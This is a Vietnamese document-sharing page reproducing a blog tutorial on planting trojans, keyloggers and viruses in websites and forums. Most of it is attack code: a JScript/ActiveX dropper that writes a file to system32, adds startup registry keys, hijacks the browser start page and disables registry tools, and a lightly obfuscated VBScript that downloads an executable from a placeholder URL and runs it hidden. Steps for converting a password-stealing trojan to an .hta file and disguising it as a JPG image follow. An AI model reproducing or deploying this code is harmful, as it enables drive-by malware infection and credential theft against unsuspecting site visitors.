intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE

Gắn trojan ,keylog ,virus vào website, forum

Chia sẻ: Nguyen Quang | Ngày: | Loại File: DOC | Số trang:6

365
lượt xem
67
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Cách đính kèm trojan vào website Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm .. Xin giới thiệu với các bạn 1 số cách a,Dùng 1 đoạn mã javascript để mở và phát tán trojan open(”địa chỉ con trojan”); Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra

Chủ đề:
Lưu

Nội dung Text: Gắn trojan ,keylog ,virus vào website, forum

  1. Gắn trojan ,keylog ,virus vào website, forum Posted on May 6, 2008 by roseandgun Cách 1 : Cách đính kèm trojan vào website Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm .. Xin giới thiệu với các bạn 1 số cách a,Dùng 1 đoạn mã javascript để mở và phát tán trojan open(”địa chỉ con trojan”); Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra b, bạn copy vào notepad đoạn mã sau: Code: try { var fso = new ActiveXObject(”Scripting.FileSystemObject”); var Shell = new ActiveXObject(”WScript.Shell”); var tfolder2 = fso.GetSpecialFolder(0); var filepath2 = tfolder2 + “\\system32\\System.js”; var a2 = fso.CreateTextFile(filepath2, true); a2.WriteLine(’var url = “Địa chỉ trojon”;’); a2.WriteLine(’var burl = “Địa chỉ trojon”;’); a2.WriteLine(’var fso = new ActiveXObject(”Scripting.FileSystemObject”);’); a2.WriteLine(’var tfolder = fso.GetSpecialFolder(0);’); a2.WriteLine(’var filepath = tfolder + “\\\\system32\\\\System.js”;’); a2.WriteLine(’var Shell = new ActiveXObject(”WScript.Shell”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\ \\\Windows”,filepath);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32″,filepath);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page”,url);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″,url);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
  2. a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\
  3. Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Đ ịa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies \\\\System\\\\DisableRegistryTools”,1,”REG_DWORD”) ;’); a2.Close(); Shell.Run(filepath2); } catch (e){} rồi save lại với tên là : trojan.hta bạn gắn đoạn mã sau vào cuối cùng của website của bạn: Code:
  4. ]]> rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện Cách 2: đoạn đầu đưa vào diễn đàn là 01 frame đoạn 2 Code: on error resume next dl = “Đường dẫn con Virus dạng .exe” Set df = document.createElement(”object”) df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″ str=”Microsoft.XMLHTTP” Set x = df.CreateObject(str,”") a1=”Ado” a2=”db.” a3=”Str” a4=”eam” str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,”") S.type = 1 str6=”GET” x.Open str6, dl, False x.Send fname1=”bl4ck.com” set F = df.createobject(”Scripting.FileSystemObject”,”") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject(”Shell.Application”,”")
  5. Q.ShellExecute fname1,”",”",”open”,0 Cách 3 : Đầu tiên , mọi người hãy Download Program http://mail.packetstormsecurity.org/trojans/exe2vbs.zip Đây là chương trình giúp bạn Convert sang “*.hta Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim truy cập ), click vào file trojan kéo vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng Code: vào trên cùng Xuống dưới cùng thay dòng: WScript.CreateObject(”WScript.Shell”).run(pth) bằng Code: Set Shell1 = CreateObject(”WScript.Shell”) Shell1.Run(pth) Sau đó save lại thành file trojan.hta Sau đó mở file web của bạn cho Victim truy cập ra thêm code này vào để run file trojan.hta Code: ]]> để tên File có dạng File ảnh (JPG , GIF ,BMP …) : Theo cách 2 , mở Notepad : Code: on error resume next dl = “Đường dẫn con Virus dạng .exe” Set df = document.createElement(”object”) df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″ str=”Microsoft.XMLHTTP” Set x = df.CreateObject(str,”") a1=”Ado” a2=”db.” a3=”Str”
  6. a4=”eam” str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,”") S.type = 1 str6=”GET” x.Open str6, dl, False x.Send fname1=”bl4ck.com” set F = df.createobject(”Scripting.FileSystemObject”,”") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject(”Shell.Application”,”") Q.ShellExecute fname1,”",”",”open”,0 Save lại dưới dạng “tên File.JPG” hay . GIF tùy ý . Ví dụ : funy.JPG Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert Picture rồi cho bừa 1 bức ảnh để đỡ nghi ngờ . File - Save , Upload File funy.JPG vừa rồi lên . Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa .
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
3=>0